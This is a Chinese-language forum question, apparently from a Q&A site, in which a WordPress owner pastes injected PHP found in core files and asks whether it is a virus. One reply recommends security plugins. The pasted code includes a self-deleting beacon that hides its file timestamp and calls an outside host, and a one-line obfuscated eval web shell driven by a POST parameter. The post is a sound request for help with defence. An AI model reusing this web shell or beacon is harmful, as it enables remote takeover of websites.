php - 这是wordpress病毒吗？

Question

我刚刚注意到我的一些 wordpress 项目在特定位置包含一些随机代码。

例如: wp-includes/meta.php 包含在文件底部代码如下:

check_meta();
function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456732115){
        $jp_c = file_get_contents($jp);
        if($t = @strpos($jp_c,"check_meta();")) {
            $contentp = substr($jp_c,0,$t);
            if(@file_put_contents($jp, $contentp)){
                @touch($jp,$jptime);
            }
        }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}

另一个位置:wp-includes/ID3/getid.php 包含以下代码:

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

基本上，我看到的是 check_meta() 方法正在更新 wp-includes/meta.php 文件而不更改其修改时间。然后，file_get_contents 连接到一些中国服务器并通过 $_GET 传递一些数据。

在第二个文件中，str_rot13('riny') 等于eval

以前有人处理过这类问题吗？也许有人可以对这段代码说更多。期待您的回音。这一刻，我把它当作病毒来对待，因为它已经传播到我的许多项目中。

Answer 1

永远不要相信您没有包含的陌生代码!诈骗者经常试图让恶意软件看起来无害，如上所示。尝试安装 WordFence、Sucuri 或其他安全插件并运行扫描。